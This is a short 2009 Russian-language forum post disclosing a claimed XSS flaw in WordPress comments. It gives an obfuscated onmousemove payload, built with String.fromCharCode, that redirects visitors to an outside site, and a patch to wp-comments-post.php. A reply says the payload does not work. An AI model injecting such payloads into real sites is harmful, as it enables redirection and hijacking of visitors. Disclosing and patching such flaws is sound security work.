16.08.2009, 00:34
|
|
Новичок
Регистрация: 30.04.2009
Сообщений: 3
С нами:
8965036
Репутация:
0
|
|
Сообщение от [underwater]
XSS [Все версии]
Сегодня было опубликована ксс, работает вплоть до текущей версии включительно.
Код:
http://www.site.com’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
Для устранения в файле wp-comments-post.php ~40 строку изменяем:
Код:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);
-1
Не работает
|
|
|